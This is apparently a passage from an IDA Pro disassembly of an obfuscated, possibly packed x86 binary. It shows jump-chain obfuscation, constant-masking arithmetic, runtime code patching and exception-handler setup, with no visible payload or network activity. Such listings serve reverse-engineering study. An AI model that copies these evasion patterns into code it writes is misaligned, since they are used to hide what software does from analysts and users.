		sub	edi, 66D953C2h
		rol	edi, 3
		jmp	loc_456C96
; END OF FUNCTION CHUNK	FOR sub_45889B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4557D4

loc_45ACB5:				; CODE XREF: sub_4557D4-147F7j
		mov	ebp, [edi]
		jmp	loc_45421F
; END OF FUNCTION CHUNK	FOR sub_4557D4
; ---------------------------------------------------------------------------

loc_45ACBC:				; CODE XREF: hvvrg7ie:0044BC09j
		sub	esi, ebx
; START	OF FUNCTION CHUNK FOR sub_445CCD

loc_45ACBE:				; CODE XREF: sub_445CCD:loc_44BBF5j
		xor	eax, 3E3EC612h
		add	eax, 0FBCA1161h
		xor	eax, 156476D6h
		jmp	loc_4569C1
; END OF FUNCTION CHUNK	FOR sub_445CCD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442DEE

loc_45ACD5:				; CODE XREF: sub_442DEE:loc_439439j
		push	offset sub_451ADC
		jmp	nullsub_538
; END OF FUNCTION CHUNK	FOR sub_442DEE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44191F

loc_45ACDF:				; CODE XREF: sub_44191F+970Dj
		jnz	loc_44AE9A

loc_45ACE5:				; CODE XREF: sub_43D30A+2D8Cj
		jmp	loc_444DAD
; END OF FUNCTION CHUNK	FOR sub_44191F
; ---------------------------------------------------------------------------
		not	ebp
		jmp	loc_44AE97

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_45ACF1	proc near		; DATA XREF: hvvrg7ie:loc_456525o

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00448F4E SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00449A17 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D33D SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044F690 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00452310 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00456A17 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004580E9 SIZE 00000015 BYTES

		push	ebp
		mov	ebp, esp
		push	edx
		mov	edx, eax
		jmp	loc_449A17
sub_45ACF1	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B6A5

loc_45ACFC:				; CODE XREF: sub_43B6A5+75A9j
		ja	loc_45ABE1
		jmp	loc_439F50
; END OF FUNCTION CHUNK	FOR sub_43B6A5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447E20

loc_45AD07:				; CODE XREF: sub_447E20+12031j
		test	edi, esi
		jmp	loc_45476A
; END OF FUNCTION CHUNK	FOR sub_447E20
; ---------------------------------------------------------------------------
		mov	[edx], esi
		and	esi, ebp
		xor	esi, 181576AEh
		jmp	loc_447ECC
; ---------------------------------------------------------------------------
		mov	eax, 21A83CCAh
		sub	esi, 88500F4Eh
		jmp	sub_43B9C9

; =============== S U B	R O U T	I N E =======================================



sub_45AD2D	proc near		; CODE XREF: hvvrg7ie:0043C4FCj
					; sub_4403B6:loc_44BCF0p
		xchg	eax, [esp+0]
		pop	eax
		call	sub_45AD46
		retn
sub_45AD2D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4546E9

loc_45AD37:				; CODE XREF: sub_4546E9-4E1Cj
		jmp	loc_452BAC
; END OF FUNCTION CHUNK	FOR sub_4546E9
; ---------------------------------------------------------------------------

loc_45AD3C:				; CODE XREF: hvvrg7ie:00449E43j
		jmp	loc_452115
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B2AC

loc_45AD41:				; CODE XREF: sub_45B2AC-1ED87j
		jmp	sub_44973C
; END OF FUNCTION CHUNK	FOR sub_45B2AC

; =============== S U B	R O U T	I N E =======================================



sub_45AD46	proc near		; CODE XREF: sub_45AD2D+4p

; FUNCTION CHUNK AT 0043B8B4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441961 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044D58F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458730 SIZE 00000016 BYTES

		push	ebp
		jmp	loc_441961
sub_45AD46	endp

; ---------------------------------------------------------------------------
		popf
		jmp	sub_43A3C2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_320. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_45AD53:				; CODE XREF: hvvrg7ie:00455023j
		jmp	loc_44BA02
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4391F1

loc_45AD58:				; CODE XREF: sub_4391F1+Aj
		or	ecx, 79B596BAh
		and	ecx, 3CB9ADD3h
		add	ecx, 0B69F0725h
		sub	ecx, 0FCBA1CC2h
		xor	ecx, 0F14C0AA7h
		add	ecx, ebp
		add	ecx, 0F8257B97h
		mov	[ecx], eax
		jmp	loc_447A77
; END OF FUNCTION CHUNK	FOR sub_4391F1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439990

loc_45AD85:				; CODE XREF: sub_439990:loc_44F7CAj
		or	eax, 0C139094Ch
		add	eax, 264C1B02h
		xchg	eax, [esp+0]
		jmp	sub_458A13
; END OF FUNCTION CHUNK	FOR sub_439990
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_45AD99:				; CODE XREF: sub_44D2F8:loc_44614Aj
					; hvvrg7ie:loc_4545E3j
		jnz	loc_4452BE
		jmp	loc_450A6B
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439953

loc_45ADA4:				; CODE XREF: sub_439953:loc_4559B3j
		mov	[ebp-18h], edx
		push	0B7A5A458h
		pop	eax
		rol	eax, 8
		and	eax, 0E6E5C855h
		add	eax, 407C67BAh
		add	eax, ebp
		add	eax, 1ADF5025h
		jmp	loc_44402F
; END OF FUNCTION CHUNK	FOR sub_439953
; ---------------------------------------------------------------------------

loc_45ADC9:				; CODE XREF: hvvrg7ie:0045996Dj
		xor	ecx, ebx

; =============== S U B	R O U T	I N E =======================================



sub_45ADCB	proc near		; CODE XREF: sub_450810+6p

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 0043B23D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D703 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045492E SIZE 0000000D BYTES

		xchg	edx, [esp+0]
		pop	edx
		push	edx
		push	0
		push	ebp
		mov	ebp, eax
		jmp	loc_43D703
sub_45ADCB	endp

; ---------------------------------------------------------------------------

loc_45ADDA:				; CODE XREF: hvvrg7ie:0044F96Bj
		jno	loc_44BD0D
		xor	esi, ebx

; =============== S U B	R O U T	I N E =======================================



sub_45ADE2	proc near		; CODE XREF: sub_443163-4549p
		xchg	eax, [esp+0]
		pop	eax
		push	ecx
		call	sub_4468C2
		add	eax, 0E435F007h
		rol	eax, 1Ch
		jmp	loc_455DFE
sub_45ADE2	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C290

loc_45ADFA:				; CODE XREF: sub_43C290j
		call	sub_45A7E8

loc_45ADFF:				; CODE XREF: sub_441DDD+18847j
		jmp	loc_455E3E
; END OF FUNCTION CHUNK	FOR sub_43C290
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4513A7

loc_45AE04:				; CODE XREF: sub_4513A7+Dj
		jmp	sub_457C82
; END OF FUNCTION CHUNK	FOR sub_4513A7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455ACA

loc_45AE09:				; CODE XREF: sub_455ACA-858Cj
		jmp	loc_457D0C
; END OF FUNCTION CHUNK	FOR sub_455ACA
; ---------------------------------------------------------------------------

loc_45AE0E:				; CODE XREF: hvvrg7ie:0044B39Bj
		mov	eax, 0EF9F7D01h
		call	sub_450C5A
		push	esi
		push	0AD87C826h
; START	OF FUNCTION CHUNK FOR sub_446D8D

loc_45AE1E:				; CODE XREF: sub_446D8D:loc_44AC54j
		pop	esi
		sub	esi, 7B20B10Ch
		xor	esi, 40BD381h
		jmp	loc_44BAE0
; END OF FUNCTION CHUNK	FOR sub_446D8D
; ---------------------------------------------------------------------------

loc_45AE30:				; CODE XREF: hvvrg7ie:004406E4j
		mov	eax, [eax]
		mov	[eax], ebx
		mov	eax, offset dword_4578BC
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_45AE39:				; CODE XREF: sub_43D285:loc_4445DEj
		call	sub_44D160
		push	edi
		push	113017DCh
		jmp	loc_43EEC5
; END OF FUNCTION CHUNK	FOR sub_43D285
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4544DD

loc_45AE49:				; CODE XREF: sub_4544DD-19665j
					; hvvrg7ie:00456C6Cj
		push	5150E9A0h
		pop	eax
		or	eax, 219CBFCCh
		sub	eax, 9830C3AEh
		rol	eax, 13h
		xor	eax, 2473BC5Fh
		add	eax, ebp
		jmp	loc_44F65B
; END OF FUNCTION CHUNK	FOR sub_4544DD
; ---------------------------------------------------------------------------

loc_45AE6B:				; CODE XREF: hvvrg7ie:0044A16Cj
		jle	loc_43F928
		jno	loc_44DEBB
		jmp	sub_44C8C7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44059F

loc_45AE7C:				; CODE XREF: hvvrg7ie:loc_43AEDDj
					; sub_44059F+506Cj
		jp	loc_44CA9B

loc_45AE82:				; CODE XREF: sub_44059F:loc_451FB8j
		push	edi

loc_45AE83:				; CODE XREF: hvvrg7ie:loc_45B7B7j
		mov	edi, eax

loc_45AE85:				; CODE XREF: hvvrg7ie:loc_44429Bj
		xchg	edi, [esp+8+var_8]
		jmp	loc_458325
; END OF FUNCTION CHUNK	FOR sub_44059F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CA70

loc_45AE8D:				; CODE XREF: sub_43CA70+10j
		and	eax, 7C483572h
		xor	eax, 115B7E7Ah
		sub	eax, ds:4000F0h
		jnz	loc_43DA17
		mov	[eax], esi
		jg	loc_447B44
		mov	[ebp+0], ebx
		jmp	loc_43DA15
; END OF FUNCTION CHUNK	FOR sub_43CA70
; ---------------------------------------------------------------------------
		mov	ds:off_41D200, eax
		lea	eax, sub_44370F
		mov	byte ptr [eax],	0C3h
		jmp	sub_44370F

; =============== S U B	R O U T	I N E =======================================



sub_45AEC9	proc near		; CODE XREF: sub_419430+C8p
					; sub_444B4D+Ej
					; DATA XREF: ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00459C56 SIZE 00000014 BYTES

		push	esi
		call	sub_456904

loc_45AECF:				; CODE XREF: sub_43F272+9j
		mov	edx, esi
		pop	esi
		mov	eax, [esp+0]
		push	edx
		jmp	loc_459C56
sub_45AEC9	endp

; ---------------------------------------------------------------------------

loc_45AEDB:				; CODE XREF: hvvrg7ie:0043EEBFj
		add	ebx, 9B5107DEh

; =============== S U B	R O U T	I N E =======================================



sub_45AEE1	proc near		; CODE XREF: sub_448C76+6p

; FUNCTION CHUNK AT 0043C07E SIZE 00000004 BYTES
; FUNCTION CHUNK AT 0043EFED SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0043FC75 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445D88 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045487B SIZE 00000010 BYTES

		xchg	edx, [esp+0]
		pop	edx
		add	eax, 0E37E8CB6h
		jmp	loc_45487B
sub_45AEE1	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C354

loc_45AEF0:				; CODE XREF: hvvrg7ie:004559A2j
					; sub_43C354+1B3A6j
		rol	eax, 9
		push	eax
		call	sub_43E7F3
		retn
; END OF FUNCTION CHUNK	FOR sub_43C354
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447DF9

loc_45AEFA:				; CODE XREF: sub_447DF9+121E2j
		jmp	loc_45523A
; END OF FUNCTION CHUNK	FOR sub_447DF9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4544AA

loc_45AEFF:				; CODE XREF: sub_4544AA:loc_43C449j
		inc	dword ptr [ebp-104h]
		jmp	loc_455093
; END OF FUNCTION CHUNK	FOR sub_4544AA

; =============== S U B	R O U T	I N E =======================================



sub_45AF0A	proc near		; CODE XREF: sub_447146:loc_447147p

; FUNCTION CHUNK AT 0044D6BD SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00454A93 SIZE 00000008 BYTES

		call	sub_4441ED

loc_45AF0F:				; CODE XREF: sub_4529EA-8893j
		jmp	loc_44D6BD
sub_45AF0A	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4424A6

loc_45AF14:				; CODE XREF: sub_4424A6+5j
		pop	ebx
		xchg	ebx, [esp+4+var_4]
		mov	esp, ebp
		xchg	ecx, [esp+0]
		mov	ebp, ecx
		pop	ecx
		mov	eax, ds:dword_43CD98
		jmp	loc_43D0F0
; END OF FUNCTION CHUNK	FOR sub_4424A6
; ---------------------------------------------------------------------------

loc_45AF2B:				; CODE XREF: hvvrg7ie:00453AA6j
		jnz	loc_448F52
		jmp	loc_44D347
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441167

loc_45AF36:				; CODE XREF: sub_441167:loc_45891Aj
					; hvvrg7ie:0045892Aj
		xor	eax, 3AE22D8Eh
		call	sub_450C5A
		mov	ds:off_41D0B8, eax
		lea	eax, loc_459767
		mov	byte ptr [eax],	0C3h
		jmp	loc_439CD8
; END OF FUNCTION CHUNK	FOR sub_441167
; ---------------------------------------------------------------------------
		call	nullsub_25
		jmp	ds:dword_41D0BC
; ---------------------------------------------------------------------------

loc_45AF60:				; CODE XREF: hvvrg7ie:0044833Cj
		jmp	loc_456838
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_25. PRESS	KEYPAD "+" TO EXPAND]
		dw 0FE83h
		dd 0E9FFFFEFh, 0FFFE6BD9h
; ---------------------------------------------------------------------------

loc_45AF70:				; CODE XREF: hvvrg7ie:004466F5j
		or	ebp, 44387087h
		pushf

loc_45AF77:				; CODE XREF: hvvrg7ie:loc_43956Dj
		call	sub_453E08
		mov	edx, 1AE260E8h
		push	edi
		push	2385F0BCh
		jmp	loc_45463E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4418C0

loc_45AF8C:				; CODE XREF: sub_4418C0:loc_4582E3j
		call	sub_4580CF
; END OF FUNCTION CHUNK	FOR sub_4418C0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_184. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DEC3

loc_45AF92:				; CODE XREF: sub_43DEC3:loc_43DECFj
		jmp	loc_44364F
; END OF FUNCTION CHUNK	FOR sub_43DEC3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DC44

loc_45AF97:				; CODE XREF: sub_43DC44+Cj
		jmp	nullsub_489
; END OF FUNCTION CHUNK	FOR sub_43DC44

; =============== S U B	R O U T	I N E =======================================



sub_45AF9C	proc near		; DATA XREF: sub_43CA70+1BBF5o
		xchg	edi, [esp+0]
		mov	eax, edi
		pop	edi
		add	eax, 3DB52125h
		xor	eax, 9B976CD2h
		jmp	loc_45064D
sub_45AF9C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_45AFB3:				; CODE XREF: hvvrg7ie:004548A4j
		jnb	loc_44A4DB
		cmp	ebp, 4260EF2Bh
		jmp	loc_44D953
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442FD1

loc_45AFC4:				; CODE XREF: sub_442FD1:loc_4557AFj
		test	edx, ebx
		jmp	loc_44D76C
; END OF FUNCTION CHUNK	FOR sub_442FD1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B1C6

loc_45AFCB:				; CODE XREF: sub_44B1C6:loc_4424D3j
					; hvvrg7ie:004424E4j
		or	eax, 6AC227DDh
		call	sub_443E65

loc_45AFD6:				; CODE XREF: hvvrg7ie:loc_43CF77j
		jmp	loc_43FB8E
; END OF FUNCTION CHUNK	FOR sub_44B1C6
; ---------------------------------------------------------------------------

loc_45AFDB:				; DATA XREF: sub_4569C6-170Bo
		xor	edx, 5DA57B7Ch
		add	edx, ebp
		call	sub_44C8FB
; START	OF FUNCTION CHUNK FOR sub_45038B

loc_45AFE8:				; CODE XREF: sub_45038B-3532j
		jb	loc_43D25E

loc_45AFEE:				; CODE XREF: sub_45038B:loc_44CE4Cj
		or	eax, 2CDA66F4h
		xor	eax, 0BDDF67EFh
		popf
		jmp	loc_4488F1
; END OF FUNCTION CHUNK	FOR sub_45038B
; ---------------------------------------------------------------------------
		add	edx, 0CB91D2BBh
		cmp	ebp, eax
		jmp	loc_449805
; ---------------------------------------------------------------------------

loc_45B00D:				; CODE XREF: hvvrg7ie:0043FDA2j
		ja	loc_4401DF
		rol	ecx, 1Bh
		push	835FE1E2h
; START	OF FUNCTION CHUNK FOR sub_44059F

loc_45B01B:				; CODE XREF: sub_44059F+12D35j
		xor	eax, 2EB249CFh
		rol	eax, 1Bh
		jmp	loc_442A2F
; END OF FUNCTION CHUNK	FOR sub_44059F
; ---------------------------------------------------------------------------

loc_45B029:				; CODE XREF: hvvrg7ie:00445A6Fj
		not	ebp
		jmp	sub_451B45
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_532. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458706

loc_45B031:				; CODE XREF: sub_458706-5C7Cj
		jmp	loc_44ABD5
; END OF FUNCTION CHUNK	FOR sub_458706

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_45B036	proc near		; CODE XREF: sub_43FA98j

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043F51C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450607 SIZE 0000000A BYTES

		push	ebp
		mov	ebp, esp
		push	edi

loc_45B03A:				; CODE XREF: sub_43E128:loc_459E11j
		push	ecx
		pop	edi
		xchg	edi, [esp+4+var_4]
		jmp	loc_43F51C
sub_45B036	endp


; =============== S U B	R O U T	I N E =======================================



sub_45B044	proc near		; DATA XREF: sub_43B914:loc_452F02o
		add	esp, 4
		retn
sub_45B044	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_45B048	proc near		; CODE XREF: sub_43FE9B:loc_44811Dp
					; hvvrg7ie:loc_453E4Fp

; FUNCTION CHUNK AT 00439398 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00439CFB SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043A727 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043B46B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F4EE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440CC6 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00441AD3 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00442548 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00443AB3 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00444FE5 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00445EF9 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 004481EE SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0044A30D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D589 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044DBC1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044EBD6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044ED6E SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00450276 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00451373 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00451FCD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453A40 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0045461D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00454CE0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458ADD SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0045A822 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045AC12 SIZE 00000005 BYTES

		push	large dword ptr	fs:0
		mov	large fs:0, esp
		mov	eax, large fs:20h
		or	eax, eax
		jz	loc_451373
		jmp	loc_44EBD6
sub_45B048	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454D23

loc_45B06A:				; CODE XREF: sub_454D23-685Fj
		shl	eax, 9
		mov	eax, ebx
		xchg	ebx, [ebp+0]
		jo	loc_43BA98
		jmp	loc_44AD6B
; END OF FUNCTION CHUNK	FOR sub_454D23

; =============== S U B	R O U T	I N E =======================================



sub_45B07D	proc near		; CODE XREF: hvvrg7ie:00450E5Fj
					; sub_4576E4p

; FUNCTION CHUNK AT 0044F92F SIZE 00000024 BYTES
; FUNCTION CHUNK AT 004527D2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455625 SIZE 0000000B BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		push	ebp
		mov	ebp, esp
		add	esp, 0FFFFFFF8h
		mov	[ebp-4], eax

loc_45B08A:				; CODE XREF: sub_4446E9:loc_43F4A5j
		jns	loc_455625
		call	sub_4446E9
		xchg	esi, [eax]
		jmp	sub_440ABA
sub_45B07D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C2EA

loc_45B09C:				; CODE XREF: sub_44C2EA-4B38j
		pop	edi
		mov	eax, ds:dword_452340
		or	eax, eax
		jnz	loc_44FE46
		jmp	loc_454354
; END OF FUNCTION CHUNK	FOR sub_44C2EA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456E27

loc_45B0B0:				; CODE XREF: sub_456E27-12863j
		mov	edx, ebp
		xor	ebp, 6A675F73h

loc_45B0B8:				; CODE XREF: sub_456E27:loc_44E71Ej
		push	edi
		push	0D6B67979h
		or	edi, ecx
		jmp	loc_445D33
; END OF FUNCTION CHUNK	FOR sub_456E27
; ---------------------------------------------------------------------------

loc_45B0C5:				; CODE XREF: hvvrg7ie:004524CEj
		add	ecx, 794AD89Eh

loc_45B0CB:				; CODE XREF: hvvrg7ie:loc_451F4Aj
		jmp	loc_442D49
; ---------------------------------------------------------------------------
		mov	esi, [edi]
		jmp	sub_448DB2
; ---------------------------------------------------------------------------

loc_45B0D7:				; CODE XREF: hvvrg7ie:loc_451CA5j
		or	edx, 7235C771h
		add	edx, 60F920Dh
		popf
		xchg	edx, [esp]
		jmp	sub_44059F
; ---------------------------------------------------------------------------
		and	esi, 4FCB780Ch
		ror	edi, 8
		jmp	sub_44E4A0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DB53

loc_45B0FA:				; CODE XREF: sub_44DB53+37A7j
		mov	[edx], ecx
		shr	ecx, 0Fh

loc_45B0FF:				; CODE XREF: sub_44DB53:loc_4517F9j
		mov	eax, [esp+8+var_8]
		push	ecx
		mov	ecx, eax
		xchg	ecx, [esp+0Ch+var_C]
		call	sub_44612F
		or	eax, eax
		jmp	loc_444084
; END OF FUNCTION CHUNK	FOR sub_44DB53
; ---------------------------------------------------------------------------

loc_45B114:				; DATA XREF: sub_440C05+14554o
		lea	eax, sub_45046B
		mov	byte ptr [eax],	0C3h
		jmp	loc_44D2DC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B7B9

loc_45B122:				; CODE XREF: sub_43B7B9+4j
		call	sub_4471CA

loc_45B127:				; CODE XREF: sub_44059F+12ACFj
		jmp	loc_440725
; END OF FUNCTION CHUNK	FOR sub_43B7B9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F97

loc_45B12C:				; CODE XREF: sub_450F97:loc_44FDDFj
		jmp	loc_43B067
; END OF FUNCTION CHUNK	FOR sub_450F97
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446D8D

loc_45B131:				; CODE XREF: sub_446D8D+77CCj
		jmp	loc_449F04
; END OF FUNCTION CHUNK	FOR sub_446D8D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449425

loc_45B136:				; CODE XREF: sub_449425+BED5j
		call	sub_44D8CE

loc_45B13B:				; CODE XREF: sub_4484E1-C468j
		jmp	loc_44BD2E
; END OF FUNCTION CHUNK	FOR sub_449425
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44107D

loc_45B140:				; CODE XREF: sub_44107D+C152j
		mov	eax, [eax]
		mov	ds:dword_45A8A0, eax
		xor	eax, eax
		mov	ds:dword_4510BC, eax

loc_45B14E:				; CODE XREF: sub_44106C+Cj
					; sub_44107D+C147j ...
		jnz	loc_44E3EA
		jmp	loc_44FFFE
; END OF FUNCTION CHUNK	FOR sub_44107D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4518BD

loc_45B159:				; CODE XREF: sub_4518BD+9C2Aj
		xor	esi, ebx

loc_45B15B:				; CODE XREF: sub_4518BD:loc_45B4DDj
		add	eax, 1626F860h
		add	eax, ebp
; END OF FUNCTION CHUNK	FOR sub_4518BD

; =============== S U B	R O U T	I N E =======================================



sub_45B163	proc near		; CODE XREF: sub_44955C:loc_43B25Cj

; FUNCTION CHUNK AT 0044BB2D SIZE 0000001E BYTES

		push	ebx
		push	0C50D7594h
		jmp	loc_44BB2D
sub_45B163	endp

; ---------------------------------------------------------------------------

loc_45B16E:				; CODE XREF: hvvrg7ie:loc_43B8BEj
					; hvvrg7ie:0043CECEj
		jnz	loc_43C069
		push	esi
		mov	esi, edx
		xchg	esi, [esp]
		push	601BA8DAh
		pop	edx
		or	edx, 78C3D888h
		jns	loc_43B6B9
; START	OF FUNCTION CHUNK FOR sub_43AF30

loc_45B18C:				; CODE XREF: sub_43AF30+13098j
		jz	loc_441A1A
; END OF FUNCTION CHUNK	FOR sub_43AF30
; START	OF FUNCTION CHUNK FOR sub_447162

loc_45B192:				; CODE XREF: sub_447162+134A0j
		jmp	nullsub_455
; END OF FUNCTION CHUNK	FOR sub_447162
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4569C6

loc_45B197:				; CODE XREF: sub_4569C6-9393j
		jmp	loc_43C6D2
; END OF FUNCTION CHUNK	FOR sub_4569C6
; ---------------------------------------------------------------------------
		test	ebx, 0B07E65F7h
		jmp	loc_445D63
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_45B1A7:				; CODE XREF: sub_43F227:loc_447D27j
		mov	ecx, [eax]
		xchg	eax, ecx
		cdq
		sbb	ecx, 0B30263C7h
		mov	edx, 1C780C1Dh
		jmp	loc_453FCA
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------

loc_45B1BC:				; CODE XREF: hvvrg7ie:00444A55j
		sbb	ebp, edi

loc_45B1BE:				; CODE XREF: hvvrg7ie:loc_4588B1j
		push	edi
		push	3D786F4h
		pop	edi
		xor	edi, 0F7FE524Ah
		js	loc_448937
; START	OF FUNCTION CHUNK FOR sub_453E08

loc_45B1D1:				; CODE XREF: sub_453E08+2291j
		jmp	loc_440DFB
; END OF FUNCTION CHUNK	FOR sub_453E08
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44388C

loc_45B1D6:				; CODE XREF: sub_44388C+113BDj
		jmp	locret_43ADFE
; END OF FUNCTION CHUNK	FOR sub_44388C
; ---------------------------------------------------------------------------
		db 0C1h
		dd 0A6E90CE1h
		db 46h,	2 dup(0FFh)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446B4C

loc_45B1E3:				; CODE XREF: sub_446B4C:loc_45B54Aj
		mov	ebp, esp
		push	edi
		mov	edi, ecx
		xchg	edi, [esp+4+var_4]
		call	sub_447DF9
; END OF FUNCTION CHUNK	FOR sub_446B4C
; START	OF FUNCTION CHUNK FOR sub_4551D4

loc_45B1F0:				; CODE XREF: sub_4551D4+2908j
		jmp	nullsub_456
; END OF FUNCTION CHUNK	FOR sub_4551D4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_45B1F5:				; CODE XREF: sub_43F227+12C16j
		jmp	loc_4459AC
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44352A

loc_45B1FA:				; CODE XREF: sub_44352A+Bj
		jmp	loc_44EB06
; END OF FUNCTION CHUNK	FOR sub_44352A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446966

loc_45B1FF:				; CODE XREF: sub_446966:loc_446970j
		sub	ebx, 10000h
		mov	eax, [ebx]

loc_45B207:				; CODE XREF: sub_454789:loc_45764Cj
		call	sub_442406

loc_45B20C:				; CODE XREF: hvvrg7ie:00457804j
		jmp	loc_444B1E
; END OF FUNCTION CHUNK	FOR sub_446966
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_73. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AB9D

loc_45B212:				; CODE XREF: sub_45AB9D-97FBj
		jmp	loc_44CE6C
; END OF FUNCTION CHUNK	FOR sub_45AB9D
; ---------------------------------------------------------------------------

loc_45B217:				; CODE XREF: hvvrg7ie:00449BFBj
		jmp	loc_439446
